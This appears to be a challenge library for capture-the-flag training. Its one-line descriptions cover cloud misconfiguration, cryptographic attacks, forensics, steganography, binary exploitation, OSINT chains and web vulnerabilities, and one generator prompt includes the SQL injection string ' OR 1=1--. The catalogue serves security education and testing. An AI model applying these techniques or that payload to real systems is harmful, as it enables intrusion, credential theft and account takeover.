Challenge Library

Analyze an AWS Service Control Policy JSON to find the flag in a Sid field.

Find the flag hidden in an Azure RBAC role assignment JSON document.

Exploit a misconfigured serverless cloud function to obtain the flag.

Find the flag exposed as a CloudFormation parameter default value.

Parse a Cognito identity pool config to find the flag in the unauthenticated role ARN.

Spot the confused deputy vulnerability in a cross-account trust policy and find the flag.

A developer accidentally committed a .env file containing AWS credentials to a git repository. Player inspects the commit history, extracts the credentials, then accesses a private S3 bucket to retrieve the flag.

Exploit an overly permissive IAM policy to access the flag.

A three-hop cloud attack chain: an overprivileged IAM policy with lambda:* wildcards exposes a function's configuration including hardcoded S3 credentials in env vars. Player enumerates the IAM policy, pivots to the Lambda function config, extracts S3 credentials, then downloads the flag from a private bucket.

An EC2 IMDSv1 endpoint is accessible without token protection. Player traverses /latest/meta-data/iam/, retrieves temporary IAM credentials, then pivots to a private S3 bucket using those credentials to download the flag.

A Kubernetes cluster has an overprivileged service account with secrets:get across all namespaces. Player reads a K8s Secret containing AWS credentials, base64-decodes them, then pivots to a private S3 bucket to retrieve the flag.

A misconfigured serverless function exposes its environment variables or source code through an unauthenticated debug endpoint. Player discovers S3 credentials in the env vars, then accesses the private bucket to retrieve the flag.

Audit an overly permissive Lambda execution role policy to extract the flag from a Sid.

Use a leaked cloud instance metadata token to retrieve the flag.

Find a flag exposed in a public or misconfigured S3 bucket.

Spot the public read misconfiguration in an S3 bucket policy hiding the flag.

Read a Secrets Manager resource policy to find the flag in a condition value.

Leaked Terraform state file exposed in a misconfigured S3 bucket. Player enumerates the bucket, downloads terraform.tfstate, and extracts the flag from the sensitive admin_token output.

Inspect a Terraform state file to recover the flag from a sensitive output value.

Discover a secret leaked in a Dockerfile intermediate build layer.

Find a flag exposed through a misconfigured Docker socket.

Exploit a misconfigured Docker volume mount to access the flag.

Escape a privileged container to retrieve the flag from the host.

Access an exposed service dashboard to find the hidden flag.

Exploit a Kubernetes RBAC misconfiguration to read the secret flag.

Extract a flag stored in plaintext inside a Kubernetes ConfigMap.

Abuse an overprivileged Kubernetes service account to get the flag.

Find and trigger a hidden code branch to reveal the flag.

Reverse engineer a license key algorithm to generate a valid key.

Reverse engineer a binary password check to derive the correct input.

Patch a binary instruction to bypass a check and reveal the flag.

Decode multiple nested base encodings to recover the flag.

Reverse engineer custom virtual machine bytecode to get the flag.

Decode an obfuscated string encoding to find the flag.

Reverse an XOR chain obfuscation to extract the hidden flag.

Recover the ECDSA private key from two signatures sharing the same nonce k.

Exploit a faulty RSA signature implementation to extract the key.

Mount a Hastad broadcast attack on RSA to recover the plaintext flag.

Factor weak RSA primes generated with low entropy to decrypt.

Exploit textbook RSA without padding to recover the plaintext flag.

Exploit RSA with a small public exponent (e=3) to decrypt the flag.

Decrypt a Caesar cipher variant to find the hidden flag.

Reverse a columnar transposition cipher to decode the flag.

Decrypt a monoalphabetic substitution ciphertext using frequency analysis.

Break a Vigenère cipher to recover the plaintext flag.

Reverse a Linear Congruential Generator to recover the flag from PRNG outputs.

Predict Python random output by brute-forcing a Unix timestamp seed.

Exploit weak randomness in token generation to forge the flag.

Exploit a broken custom MAC scheme to forge an authenticated message.

Exploit a Diffie-Hellman small subgroup attack to recover the key.

Perform a hash length extension attack to forge an HMAC.

Exploit a flawed key exchange to recover the shared session key.

Exploit a JWT cryptographic flaw to forge an authentication token.

Find the bcrypt pepper leaked in a config comment and verify it against the hash.

Mount a CBC padding oracle attack to decrypt the flag.

Exploit CTR mode nonce reuse to recover the plaintext flag.

Exploit AES-ECB block reuse patterns to recover the plaintext flag.

Find a hardcoded encryption key in source code to decrypt the flag.

Exploit a shared encryption key across users to recover the flag.

Flag embedded as the sha512crypt ($6$) password hash of a target user in a synthetic /etc/shadow file. Solver parses the shadow format, extracts the $6$ hash, and cracks it with hashcat mode 1800 or john --format=sha512crypt.

Identify an MD5 collision between two blocks and extract the flag from the suffix.

Flag embedded as the NT password hash of a target user in a secretsdump-style credential dump (username:RID:LM_HASH:NT_HASH:::). Solver identifies the target account, extracts the NT hash, and cracks it with hashcat mode 1000 (MD4 of UTF-16LE password) or passes the hash.

Exploit a weak key derivation function to crack the encryption.

Exploit XOR key reuse across multiple ciphertexts to recover the flag.

Repair a corrupted archive and extract the hidden flag.

Extract nested compressed archives to reach the flag inside.

Crack a weak ZIP password to access the protected flag file.

Flag hidden inside a ZIP archive: comment field, disguised filename, local extra field, or password-protected nested archive.

Flag embedded in the ext2/ext3 superblock volume label field (offset 0x78, 16 bytes) and last_mounted field (offset 0x88, 64 bytes). Solver must identify the 0xEF53 magic number and navigate to the known fixed offsets to recover the flag.

Flag stored in the cluster data of a deleted FAT 8.3 directory entry (first byte 0xE5). Solver must parse the 32-byte directory entry to locate the first cluster number, then read the corresponding data sector.

Flag hidden in the FAT32 BIOS Parameter Block OEM name field (offset 3–10, 8 bytes) and repeated in the bootstrap code area. Solver must locate the BPB structure in the raw image and extract the flag bytes at the known fixed offset.

Flag appended in the file slack space — the unused bytes between the end of a file's content and the end of its allocated cluster. Solver must calculate the cluster size, locate the file end offset, and extract the bytes that follow up to the cluster boundary.

Flag embedded in the MBR bootstrap code area (offset 0x000–0x1BD). Solver reads the raw MBR, verifies the 0x55AA signature, and extracts the flag from the bootstrap region using strings or a hex editor.

Flag embedded in a synthetic NTFS MFT record — located in the resident $DATA attribute (type 0x80) and/or $FILE_NAME attribute. Solver must parse the MFT record structure to recover it.

Flag embedded as the text of a Word revision comment in word/comments.xml. Visible via the Review panel in Word/LibreOffice, or by extracting comments.xml from the DOCX ZIP.

Flag hidden inside a deleted run (w:del / w:delText) in the document track-changes markup. Visible via Show Markup in Word, or by searching for <w:delText> in the raw XML.

Flag embedded as a PDF comment line (% prefix) appended to the raw PDF byte stream. Not visible in a PDF viewer but readable with strings or a hex editor.

Flag stored as the /V value of a hidden AcroForm text widget (/FT /Tx, /F 2) appended as a PDF incremental update. Invisible in any PDF viewer; readable via qpdf --json or pdf-parser.py.

Two-revision PDF: revision 1 contains the flag in the content stream; revision 2 replaces that stream with innocent text. PDF viewers show only revision 2; forensic analysis of bytes before the first %%EOF recovers revision 1.

Flag stored as a JavaScript variable inside a /JavaScript action object appended as a PDF incremental update. Not executed by the viewer; recoverable with pdfid.py, pdf-parser.py, or qpdf --json.

Flag embedded as the text of a cell comment (note) anchored on cell A1 in xl/comments1.xml. Visible by hovering over A1 in Excel/LibreOffice, or by inspecting comments1.xml directly.

Flag hidden in cell Z1 formatted with white font on white background — invisible unless the cell is selected or reformatted. If hidden_sheet=true the entire worksheet must be unhidden first.

Flag in cell A1 of a hidden worksheet (state="hidden" in xl/workbook.xml). The sheet is invisible in the tab bar but can be revealed via Format > Sheet > Unhide in Excel/LibreOffice.

Flag stored as the value of a defined name (_secret) in xl/workbook.xml. Visible via the Name Manager in Excel/LibreOffice or by inspecting workbook.xml directly.

Flag in cell A1 of a very-hidden worksheet (state="veryHidden" in xl/workbook.xml). The sheet does not appear in the Unhide dialog — solver must inspect workbook.xml directly and change or remove the state attribute.

Flag embedded in the JFIF COM comment field (marker FF FE) of a JPEG fragment hidden in unallocated disk space. Solver must carve the file using SOI/EOI markers and extract the comment with exiftool or strings.

Extract a hidden ZIP archive embedded inside an image file.

Flag hidden in the DOCX core properties XML (docProps/core.xml). Solver extracts the document package and reads the keywords, subject, or description field with exiftool or direct XML inspection.

Flag hidden in the extended application properties (docProps/app.xml), specifically in the Company field. Visible via exiftool or by extracting app.xml from the DOCX ZIP.

Find a flag hidden in JPEG EXIF metadata fields.

Flag hidden in the PDF /Info dictionary (Author, Keywords, or Subject field). Solver reads document metadata with exiftool or pdfinfo.

Extract a flag hidden in PNG chunk metadata fields.

Flag hidden in the XLSX core properties XML (docProps/core.xml). Solver extracts the spreadsheet package and reads the keywords or description field with exiftool or direct XML inspection.

Trace a brute-force attack followed by lateral movement in system logs.

Identify a C2 beacon in network flow logs by detecting periodic connections with consistent jitter to an external IP.

Identify a malicious cron job used for persistence in system logs.

Detect DNS-based data exfiltration in captured DNS query logs.

Detect and decode a DNS-based data exfiltration channel by identifying high-entropy subdomain patterns and reassembling the exfiltrated payload.

Trace unauthorized group membership changes enabling privilege escalation.

Find the broken link in a log hash chain to locate tampering.

Trace lateral movement through system logs to find the flag.

Detect injected log entries to uncover the attacker's hidden flag.

Detect a gap created by log rotation manipulation to find the flag.

Detect tampered log entries and recover the original flag.

Trace a simulated pass-the-hash attack through authentication event logs.

Follow privilege escalation events in logs to recover the flag.

Detect the initial foothold of a ransomware operator via WMI execution, scheduled task creation, and encoded PowerShell in Windows event logs.

Identify a persistence mechanism hidden in service configuration logs.

Detect a persistence mechanism planted via a new Windows service registration following a privilege escalation event.

Identify unauthorized access to the shadow password file in logs.

Detect sudo timestamp manipulation in authentication logs.

Find SUID binary abuse leading to privilege escalation in audit logs.

Identify timestamp anomalies in logs to reconstruct attack timing.

Reconstruct a web application attack chain from access logs and WAF events: SQL injection → path traversal → web shell upload → post-exploitation command.

Flag embedded in the process environment block; variable name and value encoding are obfuscated at higher difficulties.

Find a plaintext password stored in a process memory dump.

Identify a malicious process injection event in a memory image.

Flag split into N chunks scattered across the dump; each difficulty tier changes the marker scheme and chunk ordering strategy.

Extract a hidden flag from a memory dump using Volatility.

Flag stored as a UTF-16LE wchar_t string in a process heap dump; strings without -e l will not reveal it.

Flag XOR-encoded with a 1-byte key stored visibly elsewhere in the dump; solver must locate the key and apply XOR.

ARP poisoning captured in PCAP; flag encoded in crafted MAC address or ARP payload field.

Detect and decode a flag hidden in DNS tunnel traffic.

”Generate PCAP of FTP session with flag in RETR response body.”

gRPC over HTTP/2 captured; flag embedded in a protobuf field within a request or response frame.

Reconstruct an HTTP session from a PCAP to find the flag.

”Generate PCAP with flag hidden in ICMP echo request data payload. Noise is benign TCP/UDP traffic.”

”Generate PCAP of IRC session with flag in PRIVMSG body; hard mode: base64-encoded.”

”Generate PCAP of Kerberos AS-REP exchange with flag base64-encoded in enc-part cipher field.”

LDAP query/response PCAP; flag stored in a custom attribute value returned by the directory.

mDNS/Bonjour traffic captured; flag encoded in a TXT record of an advertised service.

”Generate Modbus TCP PCAP with flag encoded as register byte values in a Read Holding Registers response.”

”Generate a structurally corrupted PCAP (truncated, fragmented records, or invalid headers); player must repair the binary before analysis.”

Analyze a network capture to extract plaintext credentials.

Analyze an FTP session PCAP to find the flag in a server response.

Parse HTTP/2 gRPC frames in a PCAP to find the flag in a custom metadata header.

Find the flag exfiltrated via an IRC PRIVMSG in a captured network session.

Inspect a Kerberos AS-REP in a PCAP to find the flag in the encrypted ticket field.

Inspect an LDAP search response PCAP to extract the flag from a DN attribute.

Extract the flag from an mDNS TXT record response in a PCAP capture.

Decode Modbus register values from a PCAP to reconstruct the hidden flag.

Inspect a SIP REGISTER packet in a PCAP to extract the flag from the Contact header.

Intercept an SMTP session PCAP and find the flag in an email Subject.

Reconstruct a Telnet terminal session from a PCAP to find the flag.

Use a simulated NSS keylog entry in a PCAP comment to decrypt the TLS flag.

Parse WebSocket frames from a PCAP to recover the flag in a text message.

Flag transmitted in a generic raw TCP session payload; solver follows the stream and extracts plaintext.

SIP INVITE exchange captured; flag encoded in SDP body or custom SIP header value.

”Generate PCAP of SMTP session with flag in Subject header, optionally MIME-encoded.”

Telnet session captured in PCAP; flag delivered character-by-character in login exchange.

Identify a suspicious TLS fingerprint anomaly in captured traffic.

PCAP of TLS session provided with NSS key log file; player decrypts traffic in Wireshark to extract flag.

”Generate PCAP with HTTP 101 upgrade followed by WebSocket text frame carrying flag.”

Flag embedded in LSB of the alpha transparency channel; image appears fully opaque.

Flag hidden in bit plane N (1–4) of blue channel; revealed via stegsolve bit-plane viewer.

Flag embedded in LSB of DCT AC coefficients across 8×8 pixel blocks; no JPEG quantisation loss.

Flag encoded as an acrostic: the first letter of each paragraph in order spells the flag. Solver reads the document, extracts the first character of every paragraph, and concatenates them.

Flag hidden in a paragraph with the w:vanish run property (hidden text). Invisible in normal Word view; revealed via Format > Hidden text, or direct XML inspection of word/document.xml.

Flag embedded in LSB of all three RGB channels sequentially; extracted with zsteg.

Flag encoded as the first letter of every Nth word across the document body — a visual acrostic. Solver must extract the body text and collect the correct first-letter sequence.

Flag rendered as white text on a white background in the PDF content stream — invisible in a normal PDF viewer but present in the page object stream.

Uncover a flag concealed within an image using steganographic techniques.

Flag hidden as an acrostic: the first letter of each non-empty line spells the flag.

Flag encoded using zero-width Unicode characters (U+200B=bit-1, U+200C=bit-0) hidden inside normal-looking text.

Flag encoded via echo-hiding: each bit modulates the delay of a faint echo added to the carrier.

Extract a flag hidden in the least significant bits of a WAV file.

Flag hidden in WAV RIFF LIST/INFO chunk metadata (ICMT or INAM+IART base64-split).

Flag encoded as visible text in the audio spectrogram via additive frequency synthesis.

Two companion PNG files whose pixel-wise XOR reveals the hidden flag.

Decode a Bacon A/B binary cipher to find the hidden flag.

Decode Baudot/ITA2 5-bit encoded data to find the flag.

Execute a Brainfuck program to reveal the hidden flag output.

Decode a multi-layer custom encoding scheme to find the flag.

Reverse leet-speak character substitutions to recover the flag.

Decode a Morse code message (dots and dashes) to reveal the flag.

Reverse multiple stacked encoding layers to extract the flag.

Decode NATO phonetic words to spell out the hidden flag.

Scan a QR code image to retrieve the hidden flag.

Find a flag hidden in invisible Unicode zero-width characters.

Single CVE-vulnerable box deployed behind a WireGuard VPN gateway. The attacker connects via VPN and has direct access to the target box — no pivot required. Ideal for focused CVE exploitation training on a specific Vulhub service. The deployment URL is the VPN server endpoint; VPN credentials are provided in the challenge description.

Easy OFFSEC topology: WireGuard VPN → pivot_box (dual-homed) → 1 Vulhub box on internal network. Player must compromise pivot first, then pivot to internal target. Flag chain: collect /flag_proof from pivot + internal box, submit both proofs to flag_validator.

Hard OFFSEC topology: WireGuard VPN → pivot_box → 2 Vulhub boxes on internal network. All internal targets require pivot compromise. Player collects proofs from 3 boxes.

Insane OFFSEC topology: WireGuard VPN → pivot_box + 1 external Vulhub reachable from VPN + 2 internal Vulhub boxes only via pivot. Player must exploit all 4 boxes and submit proofs to flag_validator.

Medium OFFSEC topology: WireGuard VPN → pivot_box + 1 external Vulhub (both reachable from VPN) + 1 internal Vulhub (only via pivot). Player collects proofs from all 3 boxes and submits to flag_validator.

A mobile messaging app shows conversations between contacts. One message in a specific conversation contains the flag, either in plain text or lightly encoded. The player browses conversations and identifies the relevant message. Difficulty: easy.

Four-hop cloud attack chain: IMDS provides Lambda invocation credentials, Lambda env vars expose a K8s service account token, K8s secret holds S3 credentials, and the S3 document contains an insane-encoded flag.

A cloud instance metadata service (AWS IMDSv1) is directly accessible (simulating an SSRF target or an exposed service). The player browses the /latest/meta-data/ tree to find the attached IAM role, retrieves the temporary credentials, and extracts the flag embedded in the secret_access_key.

Three-hop cloud chain: IMDS exposes temporary S3 credentials, S3 document references a private git repository URL, and the flag is hidden in git commit history.

Player reads a corporate inbox and finds an internal email referencing a file stored in an S3 bucket. The file contains the flag.

A company website exposes a Team/About page with employee profiles. One of the profiles contains a flag hidden in the bio or in an HTML comment. The player inspects the profiles, source code, and page metadata.

Three-service corporate investigation: team page reveals an employee username, LDAP directory contains that user's inbox password as a hidden attribute, and the corporate inbox contains the flag in an email.

Player receives a seed clue (Instagram profile name or post) and must pivot to the same persona's Twitter/X account to find the flag embedded in a profile field.

Player browses a darknet forum to find a post linking to a pastebin paste. The paste contains the flag embedded among realistic leaked data.

Player enumerates fake shop orders to find an order ID, then locates the corresponding order confirmation email in the webmail inbox containing the flag.

Atypical five-service chain mixing commercial and cloud infrastructure: shop order reveals a git repository, git exposes IMDS credentials, IMDS leads to S3, and a S3 document references a chat conversation with the insane-encoded flag.

Maximum digital footprint reconstruction: five social/corporate/technical platforms converge on an OAuth private_data field containing the insane-encoded flag. Player builds a complete identity dossier step by step.

Five-hop investigation: corporate team page → LDAP credential extraction → git S3 keys → S3 document reference → inbox email with the encoded flag. Full corporate breach simulation.

Four-hop social investigation: Twitter bio references Instagram, Instagram caption reveals a chat contact, a chat message links to a pastebin paste, and the paste contains the encoded flag.

An interactive map displays points of interest in a geographic area. A forensic analyst note in the sidebar or a POI reference field contains the flag, embedded inline or as a base64 string. The player explores the map, reads POI popups and sidebar notes, and extracts the flag. Difficulty: medium.

A developer referenced a pastebin paste in a git commit message or commit log comment. Player traverses the commit history, finds the paste URL, and retrieves the flag from the paste content.

A code repository platform hosts a project where a developer accidentally committed a .env file containing credentials, then deleted it in a subsequent commit. The flag survives in the git history. The player clones the repository and inspects past commits.

A developer accidentally committed S3 credentials to a git repository. Player finds the credentials in git history, then uses them to access a private S3 bucket containing the flag.

Five-service identity-to-infrastructure chain: anonymous LDAP recon provides OAuth credentials, forged JWT exposes K8s SA token, K8s secret yields a git PAT, git commit references a pastebin paste with the hard-encoded flag.

Three-service chain: crack a weak JWT secret to forge a privileged OAuth token, use the token to extract a Kubernetes service account secret, then authenticate to a private git repository using that secret to find the flag.

A Kubernetes cluster exposes a mock API. A leaked kubeconfig grants access via an overprivileged service account. The player enumerates namespaces, lists Secrets, and decodes the flag from base64 in a Secret object in the production namespace.

An LDAP server exposes its directory in anonymous read mode (intentional misconfiguration). The player enumerates OUs, user accounts, and service accounts via ldapsearch or the web browser. The flag is hidden in a custom attribute of a service account.

Player explores a map to find a POI note referencing an Instagram account or hashtag. The Instagram profile contains a geotagged photo whose EXIF metadata embeds the flag.

Three-service chain combining physical and digital investigation: a map POI note hints at an Instagram photo with a steganographic clue, which leads to a chat contact; the chat conversation contains the flag.

A corporate OAuth2/OIDC server signs its JWTs with a too-short HS256 secret (6–8 chars). The player authenticates as a normal user, retrieves an access_token, cracks the secret offline via hashcat/wordlist, forges an admin token, and accesses the protected resource containing the flag in the custom_claims.

An anonymous read-enabled LDAP server exposes a service account whose custom attributes contain S3 credentials. The player enumerates the directory, extracts the credentials, then accesses the associated S3 bucket to download the file containing the flag. Difficulty: hard.

The player cross-references three sources to reconstruct the identity of a target. They find the professional email address of an employee on the corporate website, trigger an OAuth password reset, intercept the reset link in the target's webmail inbox, authenticate on the OAuth server, and read the flag in the account's custom_claims. Difficulty: hard.

A public pastebin service contains multiple pastes. One paste holds a leaked set of credentials or API key that encodes the flag. The player browses the paste index, reads paste content, and extracts the flag embedded inline in the text or as a labelled key. Difficulty: easy.

An email in the corporate webmail references a pastebin URL. The player reads the email to extract the paste slug, navigates to the pastebin service, and reads the paste content to find the flag. Difficulty: medium (cross-service correlation required).

The player accesses a pre-loaded webmail interface with about ten corporate emails. One message contains a secret (token, credentials, flag) in its body or subject. The other messages are realistic decoys (HR, IT, alerts). Difficulty: easy.

Player finds a Messenger/Telegram username in the persona Instagram profile, then navigates to a chat conversation containing the flag embedded in a message.

The Instagram profile of a target contains, hidden in their bio, an alias used on a darknet forum. The player identifies this alias, locates the posts of this account on the forum, and extracts the flag from a message posted in plaintext in a discussion thread. Difficulty: medium.

Player traces a threat actor from their public Twitter persona through Instagram to a darknet forum alias, then locates a private chat conversation where the encoded flag is hidden in a message.

Player queries WHOIS for a domain and finds a registrant name/email. That person appears on the company team page with the flag hidden in their employee profile.

Three-step investigation: player queries WHOIS to identify the registrant, matches them to a corporate directory employee, then accesses the employee inbox to find the flag in an email.

Player correlates a domain registrant via WHOIS, enumerates LDAP to extract the person's email password, then accesses their inbox to find the flag in an email generated by email_dump.

“Require multiple %n writes to build target address.”

“Allow %n writes to overwrite GOT entry of exit() to win().”

“Binary prints user input via printf(user_input). Leak stack/libc.”

Exploit a tcache double-free to corrupt the free-list fd pointer, redirecting a subsequent malloc() to an attacker-chosen address. Write a function pointer there to call win().

“Menu-based allocator with use-after-free allowing overwrite of function pointer.”

“Integer overflow in length calculation allows overflow of buffer.”

“Off-by-one overwrites null terminator leading to control.”

“Signed integer used as unsigned index.”

"Type confusion via out-of-bounds negative index dispatches wrong function pointer (win)."

“Simulate seccomp by manually filtering allowed commands; bypass via logic bug.”

"Minimal ROP: only syscall+pop_rax gadgets. Craft sigreturn frame to call open/read/write."

“Binary includes stack canary; leak via format string, then overflow.”

Leak a libc address via a format string primitive, compute the libc base, and redirect execution to a one_gadget — a single address in libc that spawns a shell when register constraints are met.

"Round 1: format string leaks code pointer → compute PIE base. Round 2: BOF → ROP to win()."

“Enable NX, disable PIE, leak libc address via printf, require ret2libc to call system.”

“Binary must require ROP chain to call win() or system. Provide clear leak primitive.”

Inject and execute shellcode directly on the stack (NX disabled). The binary reads user input into an executable stack buffer and jumps to it. Easy variant prints the buffer and win() addresses.

“Generate a C binary with classic stack overflow (gets or vulnerable scanf). Compile with -fno-stack-protector -no-pie. Flag printed via hidden function.”

The overflow is limited to 8 bytes past saved RBP — not enough for a full ROP chain. Plant a ROP chain in a global BSS buffer (via an unlimited first read), then use a leave;ret gadget to pivot RSP into it.

Exploit a CORS misconfiguration to steal data cross-origin.

Exploit an over-exposed GraphQL schema to extract sensitive data.

Discover a hidden admin endpoint to access privileged functionality.

Escalate horizontally to access another user's account data.

Exploit numeric IDOR to access another user's private data.

Predict a guessable UUID to access unauthorized resources.

Exploit mass assignment to set privileged fields on a user object.

Exploit a multi-tenant isolation flaw to access another tenant's data.

Use HTTP parameter pollution to bypass access control checks.

Use HTTP verb confusion to bypass authorization on a REST endpoint.

Exploit a role misassignment vulnerability to gain elevated permissions.

Escalate privileges vertically to gain admin-level access.

Player receives an HTTP exchange artifact and must manipulate the X-Forwarded-For header to bypass IP-based access control.

Leak API key in JS bundle or debug endpoint; key grants access to /admin/flag.

Abuse a batch API endpoint to exfiltrate bulk sensitive data.

Manipulate pagination parameters to access out-of-bounds records.

Bypass rate limiting to perform unrestricted brute-force or enumeration.

Expose /swagger or /openapi.json containing hidden admin endpoints or example API keys leading to flag.

Exploit a two-factor authentication logic flaw to skip verification.

Bypass an account lockout mechanism to authenticate as admin.

Exploit blind SQL injection in a login form to bypass authentication.

Exploit a boolean-based authentication logic flaw to gain access.

Tamper with a predictable cookie value to escalate privileges.

Player receives a CSRF token artifact and must understand why the token is predictable or mis-scoped to complete the attack.

Bypass email verification logic to access a restricted account.

Player receives a GraphQL bearer token artifact and must decode or forge the token to access privileged queries.

Brute force a weak HMAC secret to forge authentication cookies.

Exploit a predictable remember-me token to bypass authentication.

Forge a JWT by exploiting the algorithm=none vulnerability.

Exploit RS256/HS256 algorithm confusion to forge a valid JWT.

Inject a malicious kid header to forge a trusted JWT token.

“Vulnerable login uses string-concatenated SQL. Provide /login + /flag gated by auth. Deterministic bypass with ' OR 1=1--.”

Exploit an OAuth misconfiguration to steal user access tokens.

Chain an open redirect with OAuth to steal an authorization token.

Exploit one-time password reuse to authenticate without valid credentials.

Player receives a PASETO token with a weak or deterministic symmetric key and must forge a token with elevated claims.

Predict a password reset token to take over a victim account.

Player receives a refresh token that never expires and must exploit the lack of rotation/expiry to elevate privileges.

Bypass SAML signature validation to forge an authentication assertion.

Exploit session fixation to hijack an authenticated user session.

Steal and replay a session token to access a protected account.

Exploit a weak password policy to brute-force the admin account.

Stack coupons beyond the intended limit to unlock the flag reward.

Exploit a double-spend vulnerability in a credit balance system.

Abuse a feature flag to enable a hidden admin-only capability.

Exploit application logic flaws to escalate to admin privileges.

Tamper with order status transitions to unlock a restricted flag.

Bypass a payment flow to access a premium feature without paying.

Manipulate order quantities to access premium features for free.

Win a race condition to bypass a one-time-use token check.

Exploit a time-of-check/time-of-use flaw to access restricted data.

Analyze a simulated archive bomb to safely extract the flag inside.

Manipulate Content-Type headers to bypass upload restrictions.

Bypass file extension filtering to upload a malicious file.

Exploit insecure deserialization to achieve remote code execution.

Trigger a PHP PHAR deserialization gadget to execute code.

Exploit Python pickle deserialization to execute arbitrary code.

Pollute JavaScript object prototypes to bypass security checks.

Upload a web shell by bypassing file type restrictions.

Exploit YAML unsafe deserialization to execute arbitrary commands.

Exploit ZIP path traversal to overwrite files outside the target directory.

Inject extra arguments into a system call to read protected files.

Inject shell commands through an unsanitized input to get the flag.

Inject LDAP filter syntax to bypass authentication or leak data.

Exploit local file inclusion to read the flag from the filesystem.

Inject NoSQL operators to bypass authentication and extract data.

Traverse the filesystem using ../ sequences to read the flag file.

Exploit remote file inclusion to load and execute a remote payload.

Exploit classic SQL injection to extract the flag from the database.

Use time-based blind SQL injection to extract the flag character by character.

Exploit second-order SQL injection triggered by stored user input.

Chain multiple SSTI steps to achieve remote code execution.

Chain SSTI with code execution to achieve full RCE and read the flag.

Exploit server-side template injection to execute code and get the flag.

Exploit SSRF to make the server fetch internal resources.

Exploit simulated DNS rebinding to bypass same-origin policy.

Use Gopher protocol SSRF to interact with internal TCP services.

Use SSRF to reach an internal admin panel and extract the flag.

Chain SSRF with Gopher to send commands to an internal Redis instance.

Bypass SSRF protections using URL encoding or redirect tricks.

Use SSRF to access the mocked cloud instance metadata endpoint.

Exploit a PDF renderer to perform SSRF against internal services.

Exploit a webhook URL parameter to pivot SSRF into internal networks.

Inject AngularJS template expressions to execute arbitrary JavaScript.

Bypass Content Security Policy to execute a malicious XSS payload.

Exploit DOM-based XSS to execute JavaScript in the victim's browser.

Upload a malicious file to trigger stored XSS in the admin panel.

Exploit unsafe Markdown rendering to inject and execute XSS.

Inject a reflected XSS payload to steal the admin's session cookie.

Register a malicious service worker to intercept user requests.

Plant a stored XSS payload to exfiltrate the admin's cookie.